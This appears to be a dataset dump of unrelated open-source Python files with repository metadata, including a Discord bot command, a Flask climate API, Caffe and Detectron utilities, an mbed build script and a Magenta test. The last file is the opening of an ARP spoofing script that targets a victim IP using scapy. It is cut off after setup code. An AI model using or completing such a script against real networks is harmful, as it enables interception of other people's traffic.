] | 3 | 2017-09-17T03:29:35.000Z | 2019-06-03T10:43:08.000Z |
"""
Utilities for the root stuff.
"""
| 7.8 | 29 | 0.615385 |
4dcfa7bb89b92c1a077cd0c8c51dd8412f2a6806 | 573 | py | Python | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 17 | 2018-06-27T03:49:03.000Z | 2021-04-13T07:32:43.000Z | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 3 | 2020-03-26T06:49:10.000Z | 2020-04-23T07:20:41.000Z | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 14 | 2018-06-27T03:49:06.000Z | 2021-10-07T23:28:44.000Z | from .checks import *
from ..config import *
from ..pug import Pug
from ..utils import *
@check(have_no_pug, invalid_number)
async def addwin(message, pugs, user_input, client):
owned_pug = find_in_list(lambda pug: pug.owner == message.author, pugs)
team_num = int(user_input["arguments"])
# If the number is not in the correct range
if not 1 <= team_num <= len(owned_pug.teams):
return await message.channel.send(INVALID_NUMBER)
# Update wins
owned_pug.teams[team_num-1].wins += 1
await update_status(message.channel, owned_pug) | 31.833333 | 75 | 0.706806 |
9e4d51943c1085f0e22b2dd11d2882dafb09854d | 2,303 | py | Python | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | import numpy as np
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
measurement = Base.classes.measurement
station = Base.classes.station
app = Flask(__name__)
@app.route("/")
def welcome():
"""List available API routes"""
return(
f"Available Routes:<br/>"
f"/precipitation<br/>"
f"/stations<br/>"
f"/tobs<br/>"
)
@app.route("/precipitation")
def precipitation():
#create session and query precipation and date data
session = Session(engine)
results = session.query(measurement.date, measurement.prcp).all()
session.close()
#create dictionary from row data and append to a list
precip = []
for date, prcp in results:
precip_dict = {}
precip_dict["date"] = date
precip_dict["prcp"] = prcp
precip.append(precip_dict)
return jsonify(precip)
@app.route("/stations")
def stations():
#create session to pull station information
session = Session(engine)
results2 = session.query(station.station).all()
session.close()
#create dictionary from row data and append to a list
stations = []
for row in results2:
station_dict = {}
station_dict["station"] = row
stations.append(station_dict)
return jsonify(stations)
@app.route("/tobs")
def tobs():
#create session to pull last year of data for most active station
session = Session(engine)
one_year_ago = dt.date(2017, 8, 23) - dt.timedelta(days = 365)
results3 = session.query(measurement.date, measurement.tobs).\
filter(measurement.date >= one_year_ago).\
filter(measurement.station =='USC00519281').all()
session.close()
#create dictionary from row data and append to a list
tobs_list = []
for date, tobs in results3:
tobs_dict = {}
tobs_dict["date"] = date
tobs_dict["tobs"] = tobs
tobs_list.append(tobs_dict)
return jsonify(tobs_list)
if __name__ == '__main__':
app.run(debug=True) | 23.262626 | 69 | 0.657838 |
195e4f0d3a6ac01d68b0de7a4f340dbe40ae3dbb | 4,415 | py | Python | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | import os
import sys
import argparse
import logging
import numpy as np
try:
caffe_root = '/workspace/caffe/'
sys.path.insert(0, caffe_root + 'python')
import caffe
except ImportError:
logging.fatal("Cannot find caffe!")
from caffe.proto import caffe_pb2
from google.protobuf import text_format
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True, help='.prototxt file for inference')
parser.add_argument('--weights', type=str, required=True, help='.caffemodel file for inference')
return parser
bn_maps = {}
def find_top_after_bn(layers, name, top):
bn_maps[name] = {}
for l in layers:
if len(l.bottom) == 0:
continue
if l.bottom[0] == top and l.type == "BatchNorm":
bn_maps[name]["bn"] = l.name
top = l.top[0]
if l.bottom[0] == top and l.type == "Scale":
bn_maps[name]["scale"] = l.name
top = l.top[0]
return top
def pre_process(expected_proto, new_proto):
net_specs = caffe_pb2.NetParameter()
net_specs2 = caffe_pb2.NetParameter()
with open(expected_proto, "r") as fp:
text_format.Merge(str(fp.read()), net_specs)
net_specs2.MergeFrom(net_specs)
layers = net_specs.layer
num_layers = len(layers)
for i in range(num_layers - 1, -1, -1):
del net_specs2.layer[i]
for idx in range(num_layers):
l = layers[idx]
if l.type == "BatchNorm" or l.type == "Scale":
continue
elif l.type == "Convolution" or l.type == "Deconvolution":
top = find_top_after_bn(layers, l.name, l.top[0])
bn_maps[l.name]["type"] = l.type
layer = net_specs2.layer.add()
layer.MergeFrom(l)
layer.top[0] = top
layer.convolution_param.bias_term = True
else:
layer = net_specs2.layer.add()
layer.MergeFrom(l)
with open(new_proto, "w") as fp:
fp.write("{}".format(net_specs2))
def load_weights(net, nobn):
if sys.version_info > (3,0):
listKeys = nobn.params.keys()
else:
listKeys = nobn.params.iterkeys()
for key in listKeys:
if type(nobn.params[key]) is caffe._caffe.BlobVec:
conv = net.params[key]
if key not in bn_maps or "bn" not in bn_maps[key]:
for i, w in enumerate(conv):
nobn.params[key][i].data[...] = w.data
else:
print(key)
bn = net.params[bn_maps[key]["bn"]]
scale = net.params[bn_maps[key]["scale"]]
wt = conv[0].data
channels = 0
if bn_maps[key]["type"] == "Convolution":
channels = wt.shape[0]
elif bn_maps[key]["type"] == "Deconvolution":
channels = wt.shape[1]
else:
print("error type " + bn_maps[key]["type"])
exit(-1)
bias = np.zeros(channels)
if len(conv) > 1:
bias = conv[1].data
mean = bn[0].data
var = bn[1].data
scalef = bn[2].data
scales = scale[0].data
shift = scale[1].data
if scalef != 0:
scalef = 1. / scalef
mean = mean * scalef
var = var * scalef
rstd = 1. / np.sqrt(var + 1e-5)
if bn_maps[key]["type"] == "Convolution":
rstd1 = rstd.reshape((channels,1,1,1))
scales1 = scales.reshape((channels,1,1,1))
wt = wt * rstd1 * scales1
else:
rstd1 = rstd.reshape((1, channels,1,1))
scales1 = scales.reshape((1, channels,1,1))
wt = wt * rstd1 * scales1
bias = (bias - mean) * rstd * scales + shift
nobn.params[key][0].data[...] = wt
nobn.params[key][1].data[...] = bias
if __name__ == '__main__':
parser1 = make_parser()
args = parser1.parse_args()
pre_process(args.model, "no_bn.prototxt")
net = caffe.Net(args.model, args.weights, caffe.TEST)
net2 = caffe.Net("no_bn.prototxt", caffe.TEST)
load_weights(net, net2)
net2.save("no_bn.caffemodel")
| 34.224806 | 100 | 0.526387 |
35d0a516cc0127e96dc9ee9cc43b234c522bdadd | 7,605 | py | Python | workspace_tools/build_travis.py | kaizen8501/mbed4ECO | 525c1f203539fef4144d5281d70f526f7a12af09 | [
"Apache-2.0"
] | 1 | 2018-11-01T03:46:39.000Z | 2018-11-01T03:46:39.000Z | workspace_tools/build_travis.py | hjjeon0608/mbed_for_W7500P | 08da4a338d32293d01a605bbcf350af98e058ca2 | [
"Apache-2.0"
] | null | null | null | workspace_tools/build_travis.py | hjjeon0608/mbed_for_W7500P | 08da4a338d32293d01a605bbcf350af98e058ca2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
"""
Travis-CI build script
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
################################################################################
# Configure builds here
# "libs" can contain "dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"
build_list = (
{ "target": "LPC1768", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"] },
{ "target": "LPC2368", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC2460", "toolchains": "GCC_ARM", "libs": ["rtos", "usb_host", "usb", "fat"] },
{ "target": "LPC11U24", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "OC_MBUINO", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC11U24_301", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "NUCLEO_L053R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_L152RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F030R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F070RB", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F072RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F091RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F103RB", "toolchains": "GCC_ARM", "libs": ["rtos", "fat"] },
{ "target": "NUCLEO_F302R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F334R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F401RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "MTS_MDOT_F405RG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_MDOT_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_DRAGONFLY_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "ARCH_MAX", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F051R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F334C8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F401VC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F407VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F746NG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC1114", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "UBLOX_C027", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_501", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC11U68", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U37H_401", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "KL05Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "KL25Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL43Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL46Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K20D50M", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "TEENSY3_1", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "K64F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "LPC4088", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "ARCH_PRO", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1549", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51822", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
)
################################################################################
# Configure example test building (linking against external mbed SDK libraries liek fat or rtos)
linking_list = [
{"target": "LPC1768",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_15", "MBED_16", "MBED_17"],
"eth" : ["NET_1", "NET_2", "NET_3", "NET_4"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
}
]
################################################################################
# Driver
def run_builds(dry_run):
for build in build_list:
toolchain_list = build["toolchains"]
if type(toolchain_list) != type([]): toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
cmdline = "python workspace_tools/build.py -m %s -t %s -j 4 -c --silent "% (build["target"], toolchain)
libs = build.get("libs", [])
if libs:
cmdline = cmdline + " ".join(["--" + l for l in libs])
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_linking(dry_run):
""" Function run make.py commands to build and link simple mbed SDK
tests against few libraries to make sure there are no simple linking errors.
"""
for link in linking_list:
toolchain_list = link["toolchains"]
if type(toolchain_list) != type([]):
toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
tests = link["tests"]
# Call make.py for each test group for particular library
for test_lib in tests:
test_names = tests[test_lib]
test_lib_switch = "--" + test_lib if test_lib else ""
cmdline = "python workspace_tools/make.py -m %s -t %s -c --silent %s -n %s " % (link["target"], toolchain, test_lib_switch, ",".join(test_names))
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_testsuite(dry_run):
cmdline = "python workspace_tools/singletest.py --version"
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
if __name__ == "__main__":
run_builds("-s" in sys.argv)
run_test_linking("-s" in sys.argv)
run_test_testsuite("-s" in sys.argv)
| 51.385135 | 161 | 0.534385 |
d2f6453a53cec90313b36dd97d78be6cd2724fe7 | 2,619 | py | Python | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 1 | 2019-05-21T04:55:01.000Z | 2019-05-21T04:55:01.000Z | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 89 | 2017-09-19T15:17:44.000Z | 2022-03-31T00:52:42.000Z | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 1 | 2018-02-08T01:14:48.000Z | 2018-02-08T01:14:48.000Z | from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Payments"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Braintree Settings",
"description": _("Braintree payment gateway settings"),
},
{
"type": "doctype",
"name": "PayPal Settings",
"description": _("PayPal payment gateway settings"),
},
{
"type": "doctype",
"name": "Razorpay Settings",
"description": _("Razorpay Payment gateway settings"),
},
{
"type": "doctype",
"name": "Stripe Settings",
"description": _("Stripe payment gateway settings"),
},
]
},
{
"label": _("Backup"),
"items": [
{
"type": "doctype",
"name": "Dropbox Settings",
"description": _("Dropbox backup settings"),
},
{
"type": "doctype",
"name": "S3 Backup Settings",
"description": _("S3 Backup Settings"),
},
]
},
{
"label": _("Authentication"),
"items": [
{
"type": "doctype",
"name": "Social Login Key",
"description": _("Enter keys to enable login via Facebook, Google, GitHub."),
},
{
"type": "doctype",
"name": "LDAP Settings",
"description": _("Ldap settings"),
},
{
"type": "doctype",
"name": "OAuth Client",
"description": _("Register OAuth Client App"),
},
{
"type": "doctype",
"name": "OAuth Provider Settings",
"description": _("Settings for OAuth Provider"),
},
]
},
{
"label": _("Webhook"),
"items": [
{
"type": "doctype",
"name": "Webhook",
"description": _("Webhooks calling API requests into web apps"),
},
{
"type": "doctype",
"name": "Slack Webhook URL",
"description": _("Slack Webhooks for internal integration"),
},
]
},
{
"label": _("Google Services"),
"items": [
{
"type": "doctype",
"name": "Google Maps",
"description": _("Google Maps integration"),
},
{
"type": "doctype",
"name": "GCalendar Settings",
"description": _("Configure your google calendar integration"),
},
{
"type": "doctype",
"name": "GCalendar Account",
"description": _("Configure accounts for google calendar"),
},
{
"type": "doctype",
"name": "GSuite Settings",
"description": _("Enter keys to enable integration with Google GSuite"),
},
{
"type": "doctype",
"name": "GSuite Templates",
"description": _("Google GSuite Templates to integration with DocTypes"),
}
]
}
]
| 22.194915 | 82 | 0.534937 |
d99c6716bc0c544ea895e51025ed511dc28e31b5 | 4,905 | py | Python | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 58 | 2019-01-03T02:20:41.000Z | 2022-02-25T14:24:13.000Z | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 6 | 2019-02-12T03:52:08.000Z | 2020-12-17T02:40:37.000Z | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 5 | 2019-01-03T06:46:04.000Z | 2019-10-29T07:40:11.000Z | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Helpful utilities for working with Caffe2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from six import string_types
import contextlib
from caffe2.proto import caffe2_pb2
from caffe2.python import core
from caffe2.python import dyndep
from caffe2.python import scope
import utils.env as envu
def import_contrib_ops():
"""Import contrib ops needed by Detectron."""
envu.import_nccl_ops()
def import_detectron_ops():
"""Import Detectron ops."""
detectron_ops_lib = envu.get_detectron_ops_lib()
dyndep.InitOpsLibrary(detectron_ops_lib)
def import_custom_ops():
"""Import custom ops."""
custom_ops_lib = envu.get_custom_ops_lib()
dyndep.InitOpsLibrary(custom_ops_lib)
def SuffixNet(name, net, prefix_len, outputs):
"""Returns a new Net from the given Net (`net`) that includes only the ops
after removing the first `prefix_len` number of ops. The new Net is thus a
suffix of `net`. Blobs listed in `outputs` are registered as external output
blobs.
"""
outputs = BlobReferenceList(outputs)
for output in outputs:
assert net.BlobIsDefined(output)
new_net = net.Clone(name)
del new_net.Proto().op[:]
del new_net.Proto().external_input[:]
del new_net.Proto().external_output[:]
# Add suffix ops
new_net.Proto().op.extend(net.Proto().op[prefix_len:])
# Add external input blobs
# Treat any undefined blobs as external inputs
input_names = [
i for op in new_net.Proto().op for i in op.input
if not new_net.BlobIsDefined(i)]
new_net.Proto().external_input.extend(input_names)
# Add external output blobs
output_names = [str(o) for o in outputs]
new_net.Proto().external_output.extend(output_names)
return new_net, [new_net.GetBlobRef(o) for o in output_names]
def BlobReferenceList(blob_ref_or_list):
"""Ensure that the argument is returned as a list of BlobReferences."""
if isinstance(blob_ref_or_list, core.BlobReference):
return [blob_ref_or_list]
elif type(blob_ref_or_list) in (list, tuple):
for b in blob_ref_or_list:
assert isinstance(b, core.BlobReference)
return blob_ref_or_list
else:
raise TypeError(
'blob_ref_or_list must be a BlobReference or a list/tuple of '
'BlobReferences'
)
def UnscopeName(possibly_scoped_name):
"""Remove any name scoping from a (possibly) scoped name. For example,
convert the name 'gpu_0/foo' to 'foo'."""
assert isinstance(possibly_scoped_name, string_types)
if possibly_scoped_name[:3]!='gpu':
return possibly_scoped_name
return possibly_scoped_name[
possibly_scoped_name.find(scope._NAMESCOPE_SEPARATOR) + 1:]
@contextlib.contextmanager
def NamedCudaScope(gpu_id):
"""Creates a GPU name scope and CUDA device scope. This function is provided
to reduce `with ...` nesting levels."""
with GpuNameScope(gpu_id):
with CudaScope(gpu_id):
yield
@contextlib.contextmanager
def NamedTeacherScope():
"""Creates a GPU name scope and CUDA device scope. This function is provided
to reduce `with ...` nesting levels."""
with core.NameScope('teacher'):
yield
@contextlib.contextmanager
def GpuNameScope(gpu_id):
"""Create a name scope for GPU device `gpu_id`."""
with core.NameScope('gpu_{:d}'.format(gpu_id)):
yield
@contextlib.contextmanager
def CudaScope(gpu_id):
"""Create a CUDA device scope for GPU device `gpu_id`."""
gpu_dev = CudaDevice(gpu_id)
with core.DeviceScope(gpu_dev):
yield
@contextlib.contextmanager
def CpuScope():
"""Create a CPU device scope."""
cpu_dev = core.DeviceOption(caffe2_pb2.CPU)
with core.DeviceScope(cpu_dev):
yield
def CudaDevice(gpu_id):
"""Create a Cuda device."""
return core.DeviceOption(caffe2_pb2.CUDA, gpu_id)
def gauss_fill(std):
"""Gaussian fill helper to reduce verbosity."""
return ('GaussianFill', {'std': std})
def const_fill(value):
"""Constant fill helper to reduce verbosity."""
return ('ConstantFill', {'value': value})
| 31.645161 | 80 | 0.699898 |
3af9ba29e7e85207d849078f76e2828b0508b19d | 243 | py | Python | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 9 | 2018-11-15T10:09:17.000Z | 2021-01-12T05:59:19.000Z | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 2 | 2019-07-01T15:33:46.000Z | 2019-07-12T13:04:08.000Z | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 4 | 2018-12-02T15:14:04.000Z | 2020-05-28T12:57:24.000Z |
class MultiElement:
def __init__(self, elements):
self.__elements = elements
def get_instance_count(self):
return len(self.__elements)
def get_element_at_index(self, index):
return self.__elements[index] | 22.090909 | 42 | 0.687243 |
d094758bef48cde069cc95bd39d43aa1e492ad78 | 363 | py | Python | pyluos/services/gate.py | BHAY-3DiTex/Pyluos | c3285e5378860679236cb6b97981d66a24aeefa8 | [
"MIT"
] | 16 | 2020-03-22T11:21:17.000Z | 2022-01-04T08:45:20.000Z | pyluos/services/gate.py | BHAY-3DiTex/Pyluos | c3285e5378860679236cb6b97981d66a24aeefa8 | [
"MIT"
] | 32 | 2020-03-20T17:06:55.000Z | 2022-02-28T12:59:42.000Z | pyluos/services/gate.py | Luos-io/pyluos | ff90e129159ae0569c0b82a49ee5c0de9914441f | [
"MIT"
] | 9 | 2020-06-07T09:52:13.000Z | 2021-12-07T00:41:29.000Z | from .service import Service
class Gate(Service):
def __init__(self, id, alias, device):
Service.__init__(self, 'Gate', id, alias, device)
def _update(self, new_state):
Service._update(self, new_state)
def control(self):
def delay(delay):
self._value = delay
return interact(delay, delay=(0, 100, 1))
| 21.352941 | 57 | 0.619835 |
91cca7cc5ad731c27f326210514d0e230b06af71 | 1,019 | py | Python | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | webscraping_basic/11_daum_movies.py | tunealog/python-web-scraping | 0d625fb610f5a0979a008c2e2c9ddd31d8ef9c17 | [
"MIT"
] | null | null | null | # Python Web Scraping
# Title : Image Scraping
# Date : 2020-08-24
# Creator : tunealog
import requests
from bs4 import BeautifulSoup
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"}
for year in range(2015, 2020):
url = "https://search.daum.net/search?w=tot&q={}๋
์ํ์์&DA=MOR&rtmaxcoll=MOR".format(
year)
res = requests.get(url, headers=headers)
res.raise_for_status()
soup = BeautifulSoup(res.text, "lxml")
images = soup.find_all("img", attrs={"class": "thumb_img"})
for idx, image in enumerate(images):
image_url = image["src"]
if image_url.startswith("//"):
image_url = "https:" + image_url
print(image_url)
image_res = requests.get(image_url)
image_res.raise_for_status()
with open("movie_{}_{}.jpg".format(year, idx+1), "wb") as f:
f.write(image_res.content)
if idx >= 4:
break
| 28.305556 | 140 | 0.627085 |
24c7ba529dc86db71bae6d272afe936e985f55ff | 2,184 | py | Python | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 16 | 2016-09-02T04:59:30.000Z | 2022-01-11T10:38:29.000Z | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 2 | 2016-09-25T16:39:59.000Z | 2016-11-18T17:43:41.000Z | magenta/pipelines/pipelines_common_test.py | fanzhiyan/magenta | 622c47c19bb84c6f57b286ed03b738516b2f27d6 | [
"Apache-2.0"
] | 10 | 2016-09-02T04:59:32.000Z | 2021-09-29T06:57:24.000Z | # Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pipelines_common."""
import functools
from magenta.common import testing_lib as common_testing_lib
from magenta.pipelines import pipelines_common
import six
import tensorflow as tf
class PipelineUnitsCommonTest(tf.test.TestCase):
def _unit_transform_test(self, unit, input_instance,
expected_outputs):
outputs = unit.transform(input_instance)
self.assertTrue(isinstance(outputs, list))
common_testing_lib.assert_set_equality(self, expected_outputs, outputs)
self.assertEqual(unit.input_type, type(input_instance))
if outputs:
self.assertEqual(unit.output_type, type(outputs[0]))
def testRandomPartition(self):
random_partition = pipelines_common.RandomPartition(
str, ['a', 'b', 'c'], [0.1, 0.4])
random_nums = [0.55, 0.05, 0.34, 0.99]
choices = ['c', 'a', 'b', 'c']
random_partition.rand_func = functools.partial(six.next, iter(random_nums))
self.assertEqual(random_partition.input_type, str)
self.assertEqual(random_partition.output_type,
{'a': str, 'b': str, 'c': str})
for i, s in enumerate(['hello', 'qwerty', '1234567890', 'zxcvbnm']):
results = random_partition.transform(s)
self.assertTrue(isinstance(results, dict))
self.assertEqual(set(results.keys()), set(['a', 'b', 'c']))
self.assertEqual(len(results.values()), 3)
self.assertEqual(len([l for l in results.values() if l == []]), 2) # pylint: disable=g-explicit-bool-comparison
self.assertEqual(results[choices[i]], [s])
if __name__ == '__main__':
tf.test.main()
| 39 | 118 | 0.704212 |
950ede04e5607bce05d09ef576fdb31ce4087962 | 2,067 | py | Python | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | 2 | 2020-07-02T00:31:43.000Z | 2021-06-06T03:27:18.000Z | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | null | null | null | Python_Implementation/Test_Codes/ArpSpoofing.py | ishtiaqniloy/CSE_406_TCP_Reset_Attack_Video_Streaming | 849e3595a75cedaa8142a025eb22e1bb8871be36 | [
"MIT"
] | 1 | 2021-05-25T09:58:46.000Z | 2021-05-25T09:58:46.000Z | #!/usr/bin/python3
#running command: python ArpSpoofing.py victimIP
import sys #for command line argument
import time
import os
import shutil
import tempfile
from random import randint
from scapy.all import *
from scapy.layers.inet import *
import scapy
import socket
import uuid
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
my_ip = get_ip()
my_mac = str(':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
for ele in range(0,8*6,8)][::-1]))
victim_ip = sys.argv[1]
# victim_ip = "192.168.0.106" #for testing
network_parts = str(victim_ip).split(".")
